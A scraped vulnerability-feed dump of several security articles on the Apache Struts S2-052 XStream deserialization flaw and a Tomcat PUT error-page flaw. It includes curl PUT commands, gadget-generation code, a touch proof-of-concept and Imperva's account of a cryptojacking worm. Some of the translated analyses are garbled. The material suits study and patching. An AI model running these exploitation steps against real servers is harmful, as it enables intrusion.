[S2-052](<https://cwiki.apache.org/confluence/display/WW/S2-052>) prooves just that. If you remember, I had covered another vulnerability a couple of months ago - which is tracked under [S2-048](<http://pentestit.com/apache-struts2-showcase-remote-code-execution-s2-048/>) & CVE-2017-9791.\n\n![CVE-2017-9805](http://pentestit.com/wp-content/uploads/2017/07/Apache-Struts2.png)\n\n## What is the Apache Struts2 CVE-2017-9805 vulnerability about?\n\nThe original advisory [**here**](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) mentions the vulnerability briefly. However, the Apache Foundation description was enough for people to create a PoC even before the discoverer could make these details public. Interestingly, the original advisory has been updated to mention this - \"_Updated on 6 September: added a warning regarding multiple working exploits having been published by third parties.\"_ The vendor advisory states this - \"_The REST Plugin is using a `XStreamHandler` with an instance of XStream for deserialization without any type filtering and this can lead to Remote Code Execution when de-serializing XML payloads._\"\n\nI will not go into the details about how do you exploit this vulnerability, as I tweeted about the PoC availability yesterday itself:\n\n> CVE-2017-9805, <https://t.co/doP89huIGN> (S2-052) POC - <https://t.co/ZwTMWmTY1A>\n> \n> -- Pentestit (@pentestit) [September 5, 2017](<https://twitter.com/pentestit/status/905214097246978052>)\n\nThe PoC there works good and kudos to the author! This post tries to list down a few more payloads that I could think will be interesting to use. Without further ado, we begin with the different payloads:\n\nCVE-2017-9805 payload for a reverse connection via MSTSC (Terminal Server Connection):\n\n![CVE-2017-9805-Windows-Connect-Back](http://pentestit.com/wp-content/uploads/2017/09/CVE-2017-9805-Windows-Connect-Back.png)\n\nThis has a high success rate on Windows systems which can \"connect back\" to you.\n\nCVE-2017-9805 payload for file download no execution (figure that part out): \n![CVE-2017-9805-Windows-Download](http://pentestit.com/wp-content/uploads/2017/09/CVE-2017-9805-Windows-Download.png) \nShould work on almost all Microsoft Windows systems as long as Tomcat has the right privileges set. \nCVE-2017-9805 payload for file download on a Linux machine: \n![CVE-2017-9805-Linux](http://pentestit.com/wp-content/uploads/2017/09/Struts-S2-052.png) \nThis should also work on a good amount of systems that has cURL.\n\n## Fix CVE-2017-9805:\n\nAs the Apache Foundation suggests, the first option is to upgrade to [Struts 2.5.13](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.13>) or [Struts 2.3.34](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.34>). Secondly, you can upgrade the plugin by uploading all the required plugin JARs and it's dependencies.\n\nThe post [S2-052: Apache Struts2 REST Plugin Payloads (CVE-2017-9805)](<http://pentestit.com/apache-struts2-rest-plugin-remote-code-execution-cve-2017-9805/>) appeared first on [PenTestIT](<http://pentestit.com>).", "modified": "2017-09-07T05:33:35", "published": "2017-09-07T05:33:35", "href": "http://pentestit.com/apache-struts2-rest-plugin-remote-code-execution-cve-2017-9805/", "id": "PENTESTIT:37744BAB82BC3A7B208CCD4945FA50F7", "title": "S2-052: Apache Struts2 REST Plugin Payloads (CVE-2017-9805)", "type": "pentestit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "myhack58": [{"lastseen": "2017-07-27T14:19:58", "bulletinFamily": "info", "description": "1\\. DefaultServlet role \nI'm in front of the public, the article said, the JspServlet's role is to process the jsp and jspx files a request, then the non-jsp jspx is by the DefaultServlet to handle it different, but because it is a tasteless, not discussed here so much, here we simply believe that the static files will be cross-linked by the DefaultServlet to handle it. \n2\\. DefaultServlet can handle PUT or DELETE request, provided the request is readOnly to false, but the default value is true. In order to trigger the vulnerability \u9700\u8981\u5728conf/web.xml in the default servlet configuration add the following configuration: \n\nreadonly \n\nfalse \n3\\. In the WEB application web.xml add the following configuration for a WEB application custom 404 error page: \n404 \n/404.html \nWhen the DefaultServlet readOnly to false, we will open the DefaultServlet handle a PUT request function, we can to the target to upload the file. The request must reach the DefaultServlet to the PUT operation, which means that we can upload the type of file is restricted, for example, by default we can upload a jsp or jspx. \nFor example, the following command: \n\ncurl-i-T aaa. jsp http://localhost:8080/CVE-2017-5664/aaa.jsp \nOur intention is to aaa. jsp PUT to the target server, save it as aaa. jsp. Here we used the path is \n\nhttp://localhost:8080/CVE-2017-5664/aaa.jsp \nThis request will be JspServlet processing, rather than being DefaultServlet processing. JspServlet is not processing the PUT request that can be understood as the JspServlet will be all the requests as the GET to handle., the Which is why we can't upload jsp jspx file reasons. We can only upload other types of files, and this is usually a static file. \nFor example, in the readOnly to false, \u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5982\u4e0b\u547d\u4ee4\u4e0a\u4f20aaa.txt \n\ncurl-i-T aaa.txt http://localhost:8080/CVE-2017-5664/aaa.txt \nBecause of the above request will be DefaultServlet processing, so the PUT operation will succeed. \nOfficial for the CVE DESCRIPTION is as follows: \nThe error pagemechanism of the Java Servlet Specification requires that, when an error occursand an error page is configured for the error that occurred, the originalrequest and response are forwarded to the error page. This means that therequest is presented to the error page with the original HTTP method. \nIf the error page is a static file, the expected behaviour is to serve the content of the file as if processing a GET request,regardless of the actual HTTP method. Tomcat's Default Servlet did not do this. Depending on the original request this could lead to unexpected and undesirableresults for static error pages including, if the DefaultServlet is configuredto permit writes, the replacement or removal of the custom error page. \nThe effect is: \nThe Java Servlet specification requirements, when access of resources occurs such as 404 or 500 or the like of the error, and while the service side configuration of the corresponding error page, the original request should be forward to an error page. \nWhen the error page is a static file, the correct approach should be to ignore the original request's HTTP METHOD, direct image processing GET request as to the client returns a static error page content. However Tomcat's Default Servlet is not doing so. If the DefaultServlet configuration of the readOnly to false, then a malicious request it is possible to remove or replace the error page file. \nI'm here to say directly about how to achieve the official said \u201creplacement ofthe custom error page\u201d. \n\ncurl-i-T aaa. jsp http://localhost:8080/CVE-2017-5664/aaa.jsp \nIt says this command is not uploaded aaa. the jsp because the request is JspServlet processing. So here a direct simple way Tomcat after receiving the PUT request is how to deal with, and here it does not analyze the code. \nIt is assumed that the server is not the presence of aaa. jsp. JspServlet receipt of this request, found not to exist/aaa. the jsp corresponding to the JspServletWrapper, while the connecting/aaa. jsp this file also does not exist, then it should be returned to the client 404 in. \nBut because we in the above to the application configure a custom 404 page:/404.html so the original request is going forward to this /404.html the. \u56e0\u4e3a/404.html is a static file, it will be by the DefaultServlet to deal with here is the key, also explains why the error page must be a static file, because the only static file request will go to the DefaultServlet, the DefaultServlet discovery request is a PUT request \u6240\u4ee5\u76f4\u63a5\u5229\u7528\u4ece\u5ba2\u6237\u7aef\u4f20\u6765\u7684\u6587\u4ef6\u6570\u636e\u5c06/404.html rewrite. \nExamples \nThe original 404.html as follows: \n! [](/Article/UploadPic/2017-7/2017727184445284. png? www. myhack58. com) \nTo access a non-existent 111. jsp, returns a 404.html content: \n! [](/Article/UploadPic/2017-7/2017727184445490. png? www. myhack58. com) \nNow directly PUT to a non-existent jsp file, there is also to 111. jsp, for example: \n! [](/Article/UploadPic/2017-7/2017727184445403. png? www. myhack58. com) \nThen go to view 404.html content: \n! [](/Article/UploadPic/2017-7/2017727184445449. png? www. myhack58. com) \nThe official patch is to let the DefaultServlet rewrite inherited from the parent class of the service method, when a discovery request is due to errors forwarded over the directly as the GET to deal with: \n! [](/Article/UploadPic/2017-7/2017727184445563. png? www. myhack58. com) \nSummary \nTasteless, low risk. \nThe trigger requirements \nNeed DefaultServlet readonly value is false, default is true. \nThe requirements of service-end configure a custom static error page, and the client can trigger the appropriate error to make the request is forwarded to the error page. \n\nRepair way \nUpgrade \nIf not necessary, do not change the DefaultServlet readonly default value \nDo not use static files as error pages, you can use the jsp file. \n\n", "modified": "2017-07-27T00:00:00", "published": "2017-07-27T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/88199.htm", "id": "MYHACK58:62201788199", "title": "Tomcat Security Constraint Bypass CVE-2017-5664 analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-06-12T06:18:19", "bulletinFamily": "info", "description": "Apache Tomcat security restrictions bypass Vulnerability, CVE-2017-5664\uff09\n\nRelease date: 2017-06-12\n\nUpdate date: 2017-06-12\n\nAffected system:\n\nApache Group Tomcat 9.0.0. M1-9.0.0. M20\n\nApache Group Tomcat 8.5.0-8.5.14\n\nApache Group Tomcat 8.0.0. RC1-8.0.43\n\nApache Group Tomcat 7.0.0-7.0.77\n\n#### Description:\n\nBUGTRAQ ID: [98888](<http://www.securityfocus.com/bid/98888>)\n\nCVE(CAN) ID: [CVE-2017-5664](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5664>)\n\nApache Tomcat is a popular open source JSP application server program.\n\nApache Tomcat 9.0.0. M1-9.0.0. M20, 8.5.0-8.5.14, 8.0.0. RC1-8.0.43, 7.0.0-7.0.77 version, in the error page mechanism to achieve the presence of security vulnerabilities, according to the source of the request will lead to unexpected results, such as if the DefaultServlet is configured to allow write, for a static error page that may replace, or delete custom error pages, etc.\n\n<*source: Aniket Nandkishor Kulkarni\n\n*>\n\nRecommendations:\n\nManufacturers patch:\n\nThe Apache Group\n\n\\------------\n\nThe current vendors have released an upgrade patch to fix this security issue, please go to the manufacturers home page download:\n\n[1] <http://tomcat.apache.org/security-9.html>\n\n[2] <http://tomcat.apache.org/security-8.html>\n\n[3] <http://tomcat.apache.org/security-7.html>\n", "modified": "2017-06-12T00:00:00", "published": "2017-06-12T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/86929.htm", "id": "MYHACK58:62201786929", "title": "Apache Tomcat security restrictions bypass Vulnerability, CVE-2017-5664-a vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-09-06T21:13:29", "bulletinFamily": "info", "description": "The REST Plugin is using a XStreamHandler with an instance of XStream for deserialization without any type of filtering and this can lead to Remote Code Execution when deserializing XML payloads. - The Apache Struts civil peace Bulletin(reference 1) \n2017 9 5 March, the Apache Struts announcement of the latest ping notification Bulletin, the Apache Struts2 REST plug-in there a long code to fulfill the high-risk flaws, the flaws by lgtm. com peace fellow report instructions, the flaws numbered CVE-2017-9805\uff08S2-052 to. Struts2 REST plugin XStream components deserialization flaws, the application of the XStream component of the XML pattern of the data packet to stop the reverse sequence of manipulation, not the data content to stop useful to verify, the presence of safe risks, can be long-distance onslaught with. \nStruts2-enabled rest-plugin after and to prepare and set up XStreamHandler, the ability to incur long-distance order to fulfil this major achievement. \n0x01 flaws affect the \nAffect \nSure CVE-2017-9805 is a high-risk flaws. The reality of the scene, there must be limitations, need satisfaction must be the premise that non-struts their acquiescence to the opening of the Assembly. \nImpact version \nVersion 2.5.0 to 2.5.12 \nVersion 2.3.0 to 2.3.33 \nFix version \nThe Struts 2.5.13 \nThe Struts 2.3.34 \n0x02 flaws before \nTips details \n! [](/Article/UploadPic/2017-9/201796185648496. png? www. myhack58. com) \n\u6587\u4ef6/org/apache/struts2/rest/ContentTypeInterceptor.java \nIn the struts2 rest-plugin in the Dispose logic in the interface was the corresponding pattern of the news, will be diverted once the registration of the corresponding handler to the handler. the toobject way to stop it is instantiated, where the incoming xml news, to Is it will jump to once the world said XStreamHandler of the toobject way \n! [](/Article/UploadPic/2017-9/201796185648956. png? www. myhack58. com) \nIn Britain at the end here fromXML way after incurring an instance of the vicious thoughts of the object to be fulfilled, leading to vicious thoughts of the code to fulfill \n! [](/Article/UploadPic/2017-9/201796185648504. png? www. myhack58. com) \nThen see the calculator is the victory pop-up \nFlaws repair \n! [](/Article/UploadPic/2017-9/201796185648972. png? www. myhack58. com) \nThe new version adds XStreamPermissionProvider \n! [](/Article/UploadPic/2017-9/201796185648551. png? www. myhack58. com) \nAnd will come there are scores of createXStream stop rewriting, adds check, rebuff uneven security class to fulfill \n0x03 flaws in the application of verification \n! [](/Article/UploadPic/2017-9/201796185648981. png? www. myhack58. com) \n0x04 repair initiative \n1. Civil initiative set the plugin to dispose of the data sample is limited to json \n2. Upgrade Struts to 2. 5. 13 version or 2. 3. 34 version \n3. In XStreamHandler stop data parity or reflection\n", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/89104.htm", "id": "MYHACK58:62201789104", "title": "Apache Struts2\u2013052 vulnerability research alert-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2017-09-07T19:36:20", "bulletinFamily": "info", "description": "Struts2 S2-052 remote code perform vulnerability bug and the previous Struts2 vulnerability bug there is a difference, S2-052 operating the Java deserialization cracks, rather than reputation notorious ognl in. \nThe flaws of the trigger point is the REST plug-in to parse begged in the xml file, call the XStreamHandler, the incoming data will be tacit development deserialization, if when the incoming xml is via the process of the XStream serialization of a malicious object, it will cause a deserialization bug. \n0x01 vulnerability bug research \nThis bug's a reason the two part form, one is Struts2 REST plugin himself not to enter the data for the insurance check, causing the attacker can pass malicious xml object can be passed to XStream. The other one is XStream in the deserialization of the incoming xml causing the proximal threaded code implementation. \nThe crux of the code in the org. apache. struts2. rest. ContentTypeInterceptor. \npublic String intercept(ActionInvocation invocation) throws Exception { \nHttpServletRequest request = ServletActionContext. getRequest(); \nContentTypeHandler handler = sele CTO r. getHandlerForRequest(request); \n\nObject target = invocation. getAction(); \nif (target instanceof ModelDriven) { \ntarget = ((ModelDriven)target). getModel(); \n} \n\nif (request. getContentLength() > 0) { \nInputStream is = request. getInputStream(); \nInputStreamReader reader = new InputStreamReader(is); \nhandler. the toobject(reader, target); \n} \nreturn invocation. invoke(); \n} \nThe problem in the following two points \n\nContentTypeHandler handler = sele CTO r. getHandlerForRequest(request); \nAnd \n\nhandler. the toobject(reader, target); \nStruts2 himself away point I didn't what difficulty, this bug out in the rift dominate the aspect. \n0x02 kidding elucidating \nThis vulnerability bug, the opposite of poc generation is dominating the marshalsec equipment generates ImageIO remote code to serialize an object, the poc for the situation is java1. 8 above, which is a very harsh conditions. \nBut the presence or absence in a further version of java to coax the code?, The answer is there. Since the gap is the essence of deserialization vulnerability the bug, while the reverse sequence tool ysoserial supply a large number of deserialization code. By viewing marshalsec something to generate the XStream code, The creation of the grip below code then the cluster ysoserial instrument The code, you can generate more grip code. \npublic class XStream extends MarshallerBase implements CommonsConfiguration, Rome, CommonsBeanutils, ServiceLoader, ImageIO,BindingEnumeration, LazySearchEnumeration, SpringAbstractBeanFa CTO ryPointcutAdvisor, SpringPartiallyComparableAdvisorholder, Resin, XBean { \n\n@Override \npublic String marshal ( Object o ) throws Exception { \ncom. thoughtworks. xstream. XStream xs = new com. thoughtworks. xstream. XStream(); \nreturn xs. toXML(o); \n} \n\n@Override \npublic Object unmarshal ( String data ) throws Exception { \ncom. thoughtworks. xstream. XStream xs = new com. thoughtworks. xstream. XStream(); \nreturn xs. fromXML(data); \n} \n\n@Override \npublic Object makeComparatorTrigger ( Object tgt, Comparator cmp ) throws Exception { \nreturn JDKUtil. makePriorityQueue(tgt, cmp); \n} \n\n\npublic static void main ( String[] args ) { \nnew XStream(). run(args); \n} \n} \nManipulation of the commons. collections with XStream can be born in java1. 7 the case of constant coaxing of the poc. \n! [](/Article/UploadPic/2017-9/201797191158131. png? www. myhack58. com) \nManipulation, the implementation of the code is: \n\ntouch /tmp/manning_s2_052 \n! [](/Article/UploadPic/2017-9/201797191158703. png? www. myhack58. com) \nBorn to the exercise of the code temporarily is not outrageously\u3002 \nSu past me on the microblogging said the operation might arrive 11 this argument when the point of view not correct, in fact marshalsec and ysoserial and SerialKillerBypassGadgetCollection deserialization to manipulate the code in this bug applied, so this bug monopoly the changing altercation. \n0x03 cracks Defense \nDue to the rift dominate the transition is great, \u5021\u59cb and then blocked with the REST plug-in Struts2web it. \n\n", "modified": "2017-09-07T00:00:00", "published": "2017-09-07T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2017/89130.htm", "id": "MYHACK58:62201789130", "title": "Struts2 S2-052(CVE-2017-9805)remote code execution vulnerability bug research-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 0.0, "vector": "NONE"}}], "impervablog": [{"lastseen": "2017-09-09T07:20:50", "bulletinFamily": "blog", "description": "Just two months ago we [published an analysis](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) of a critical remote code execution (RCE) security vulnerability in Apache Struts. Now Apache Struts has published a new version fixing yet another critical RCE vulnerability (September 5, 2017).\n\n[CVE-2017-9805](<http://struts.apache.org/docs/s2-052.html>) is a vulnerability in Apache Struts related to using the Struts REST plugin with XStream handler to handle XML payloads. If exploited it allows a remote unauthenticated attacker to run malicious code on the application server to either take over the machine or launch further attacks from it.\n\n## Imperva Customers Protected\n\nIn addition to our zero-day protection rules that spotted this attack, we\u2019ve also published new dedicated security rules to provide maximum protection to Imperva SecureSphere and Incapsula WAF customers against this vulnerability. As of the publication date of this post, our systems have successfully blocked thousands of attacks from all over the world (see \"In the Wild\" section below).\n\n## Multiple Apache Struts Vulnerabilities in 2017\n\nAs mentioned above, this isn\u2019t the first time such a critical vulnerability has been found in Apache Struts. In fact, we\u2019ve seen an increasing amount of them in the Struts platform as several other RCE vulnerabilities have already been discovered since the beginning of 2017. The CVEs are summarized below.\n\n**Date** | **CVSS** | **Vulnerability** | **CVE** \n---|---|---|--- \n9/7/2017 | 9.3 | Apache Struts views/freemarker/FreemarkerManager.java Freemarker Tag Handling Remote Code Execution | 2017-12611 \n9/5/2017 | 10 | Apache Struts REST Plugin XStream XML Request Deserialization Remote Code Execution | 2017-9805 \n7/11/2017 | 5 | Apache Struts URL Validator Regular Expression URL Handling Remote DoS | 2017-7672, 2017-9804 \n7/11/2017 | 6.8 | Apache Struts Spring AOP Functionality Unspecified Remote DoS | 2017-9787 \n7/7/2017 | 10 | Apache Struts 1 Plugin for Struts 2 ActionMessage Class Error Message Input Handling Remote Code Execution | 2017-9791 \n3/6/2017 | 10 | Apache Struts Jakarta Multipart Parser File Upload Multiple Content Value Handling Remote Code Execution (Struts-Shock) | 2017-5638 \n \n## About the CVE-2017-9805 Vulnerability\n\nApache Struts contains a flaw in the REST Plugin XStream that is triggered as the program insecurely deserializes user-supplied input in XML requests. More specifically, the problem occurs in XStreamHandler\u2019s toObject () method, which does not impose any restrictions on the incoming value when using XStream deserialization into an object, resulting in arbitrary code execution vulnerabilities. More information about the vulnerability can be found [here](<https://lgtm.com/blog/apache_struts_CVE-2017-9805>).\n\n## In the Wild\n\nTo date, our systems have successfully blocked thousands of attacks from all over the world with China, as usual in Apache Struts vulnerabilities, identified as the most prominent source of attacks (see Figure 1).\n\n[![Geo-distribution of CVE-2017-9805 attacks WW - 1](https://www.imperva.com/blog/wp-content/uploads/2017/09/Distribution-of-CVE-2017-9805-attacks-WW-1-2.png)](<https://www.imperva.com/blog/wp-content/uploads/2017/09/Distribution-of-CVE-2017-9805-attacks-WW-1-2.png>)\n\n_Figure 1: Geo-distribution of CVE-2017-9805 attacks_\n\nIt is interesting to note that a single Chinese IP is responsible for more than 40% of the attack attempts that we registered. According to [Shodan](<https://www.shodan.io/>), this IP is registered to a large Chinese e-commerce company and runs an open SSH server which may indicate that this is a compromised machine. This machine tried to attack dozens of sites with different automated tools impersonating legitimate browsers such as cURL, wget, and Python-requests indicating the persistency of the attacker(s). [Unlike past vulnerabilities](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>), most of the attempted attacks (~80%) refer to exploitation attempts and only 20% refer to reconnaissance attempts to track vulnerable servers (see Figure 2). Exploitation attempts involved running operating systems such as shell, wget, or cURL in order to download malicious payload and take over the server to mount further attacks, usually [DDoS](<https://www.imperva.com/app-security/threatglossary/ddos-attacks/>), as part of a larger botnet.\n\n[![CVE-2017-9805 - payload by percentage - 2](https://www.imperva.com/blog/wp-content/uploads/2017/09/CVE-2017-9805-payload-by-percentage-2.jpg)](<https://www.imperva.com/blog/wp-content/uploads/2017/09/CVE-2017-9805-payload-by-percentage-2.jpg>)\n\n_Figure 2: Percentage of payload types of CVE-2017-9805 attack attempts_\n\n## Stay Protected with Virtual Patching\n\nBased on the official [advisory](<http://struts.apache.org/docs/s2-052.html>), this vulnerability affects applications using Struts 2.5 (Struts 2.5.12). There is no known workaround, meaning that an update is required for those who use these versions. It is also mentioned that backward compatibility is not ensured and that some REST actions stop working.\n\nAn immediate security measure organizations can use to protect against these types of vulnerabilities is virtual patching. Instead of leaving a web application exposed to attack while attempting to modify the code after discovering a vulnerability, virtual patching actively protects web apps from attacks, reducing the window of exposure and decreasing the cost of emergency fix cycles until you\u2019re able to patch them.\n\nLearn more about virtual patching and protecting web applications from vulnerabilities using [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>) or [Imperva SecureSphere WAF](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>).", "modified": "2017-09-08T16:10:08", "published": "2017-09-08T16:10:08", "id": "IMPERVABLOG:D4ED0576717DBEEDCF6B9B98BADC92BD", "href": "https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/", "title": "CVE-2017-9805: Analysis of Apache Struts RCE Vulnerability in REST Plugin", "type": "impervablog", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-03-08T20:51:51", "bulletinFamily": "blog", "description": "Recently cryptojacking attacks have been spreading like wildfire. At Imperva we have witnessed it firsthand and even concluded that these attacks [hold roughly 90% of all remote code execution attacks in web applications](<https://www.imperva.com/blog/2018/02/new-research-crypto-mining-drives-almost-90-remote-code-execution-attacks/>).\n\nHaving said that, all of the attacks we have seen so far, were somewhat limited in their complexity and capability. The attacks contained malicious code that downloaded a cryptominer executable file and ran it with a basic evasion technique or none at all.\n\nThis week we saw a new generation of cryptojacking attacks aimed at _both_ database servers and application servers. We dubbed one of these attacks _RedisWannaMine._\n\n_RedisWannaMine_ is more complex in terms of evasion techniques and capabilities. It demonstrates a worm-like behavior combined with advanced exploits to increase the attackers\u2019 infection rate and fatten their wallets.\n\n[![](https://www.imperva.com/blog/wp-content/uploads/2018/03/Screen-Shot-2018-03-08-at-7.43.49-AM.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/Screen-Shot-2018-03-08-at-7.43.49-AM.png>)\n\nIn a nutshell, **cryptojacking attackers have upped their game and they are getting crazier by the minute!**\n\n## Cryptojacking 2.0/ RedisWannaMine\n\nImperva deploys a network of sensors to gather security intelligence. These sensors are deployed in publicly accessible databases and web servers. This week we recorded an interesting remote code execution (RCE) attack through our web application sensors. When we record an RCE attack that tries to download an external resource, we try to probe the remote host to gain further security information. This was the case this week when our sensors recorded the following attack vector that tried to exploit [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>):\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic1.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic1.png>)\n\nWhen we probed the remote server we found a list of suspicious files:\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/Picture2-300x202.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/Picture2.png>)\n\nThe list includes known malicious files, like _minerd, _but also some unknown suspicious files like _transfer.sh._\n\nWhen we submitted _transfer.sh_ hash to Virus Total, we found it is fairly new, the first submission in 2018-03-05 and detected only by 10 engines:\n\n![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic3-300x227.png)\n\nThis shell script file is a downloader that is similar in some ways to older cryptojacking downloaders we know:\n\n * It downloads a crypto miner malware from an external location\n * It gains persistency in the machine through new entries in _crontab_\n * It gains remote access to the machine through a new ssh key entry in _/root/.ssh/authorized_keys _and new entries in the system\u2019s _iptables_\n\nHowever, this downloader is unlike any downloader we\u2019ve seen before. In the following sections, we will list the new capabilities it offers.\n\n## Self-sufficient\n\nThe script installs a lot of packages using Linux standard package managers like _apt _and _yum_. This is probably to make sure it is self-sufficient and does not need to depend on local libraries in the victim\u2019s machine. As a hint to things to follow we saw it installs packages like _git, python, redis-tools, wget, gcc_ and _make_.\n\n## [![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic4-300x111.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic4.png>)\n\n## Github integration\n\nThe script downloads a publicly available tool, named _masscan_, from a Github repository, then compiles and installs it.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic5-300x17.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic5.png>)\n\nThe project page <https://github.com/robertdavidgraham/masscan> describes it as \u201cTCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.\u201d\n\nAlso, it offers simple usage examples:\n\n## [![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic6-300x73.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic6.png>)\n\n## Redis scan and infection\n\nThe script then launches another process named \u201c_redisscan.sh_\u201d. The new process uses the _masscan_ tool mentioned above to discover and infect publicly available Redis servers. It does so by creating a large list of IPs, **internal** and **external** and scanning port 6379 which is the default listening port of Redis.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic7.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic7.png>)\n\nIf one of the IPs in the list is publicly available, the script launches the \u201c_redisrun.sh_\u201d process to infect it with the same crypto miner malware (\u201c_transfer.sh_\u201d). The infection is done using _redis-cli_ command line tool, that the downloader previously installed, that runs the \u201c_runcmd_\u201d payload.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic8-300x37.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic8.png>)\n\n\u201c_runcmd_\u201d is a 10-line Redis command script that creates new entries in the Redis server crontab directory and thus infects the server and gains persistency in case someone notices the malware and deletes it.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic9-300x42.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic9.png>)\n\nNotice that the attacker uses line feeds, \u201c_\\n_\u201d, at the beginning and at the end of each key value. If you run these commands in a Redis server, a file with the following content will be created:\n\n## [![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic10-300x49.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic10.png>)\n\n## SMB scan and infection\n\nAfter the script completed the Redis scan, it launches another scan process named \u201c_ebscan.sh_\u201d. This time the new process uses the _masscan_ tool to discover and infect publicly available Windows servers with the vulnerable SMB version. It does so by creating a large list of IPs, **internal** and **external**, and scanning port 445 which is the default listening port of SMB.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic11.1.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic11.1.png>)\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic11.2-300x92.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic11.2.png>)\n\nIn case you\u2019ve been living under a rock, the SMB vulnerability this script is scanning for, was used by the NSA to create the infamous \u201c_Eternal Blue_\u201d exploit. This exploit was later on adapted to carry out \u201c_WannaCry_\u201d, one the biggest cyberattacks in the world.\n\nWhen the script finds a vulnerable server, it launches the \u201c_ebrun.sh_\u201d process to infect it.\n\n\u201c_ebrun.sh_\u201d runs a Python implementation of the aforementioned \u201c_Eternal Blue_\u201d exploit and drops the file \u201c_x64.bin\u201d _in the vulnerable machine.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic12-300x60.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic12.png>)\n\nWe used the _strings_ command to print all the strings of printable characters in the file and found a code that creates a malicious VBScript file named \u201c_poc.vbs_\u201d and runs it.\n\n\u201c_poc.vbs_\u201d downloads an executable from an external location, saves it in the vulnerable server as \u201c_admissioninit.exe_\u201d and runs it. Needless to say, \u201c_admissioninit.exe\u201d _is a well-known crypto miner malware.\n\n[![WannaCryptoMine Unveiled: New Cryptojacking Attack Powered by Redis and NSA Exploits](https://www.imperva.com/blog/wp-content/uploads/2018/03/pic13-300x87.png)](<https://www.imperva.com/blog/wp-content/uploads/2018/03/pic13.png>)\n\n## What should I do?\n\n * Protect your web applications and databases. The initial attack vector was introduced through a web application vulnerability. A properly patched application or an application protected by a WAF should be safe.\n * Make sure you don\u2019t expose your Redis servers to the world. This can be achieved with a simple firewall rule.\n * Make sure you don\u2019t run machines with the vulnerable SMB version in your organization. You can use [this](<http://omerez.com/eternalblues/>) awesome tool to do check it\n\n## 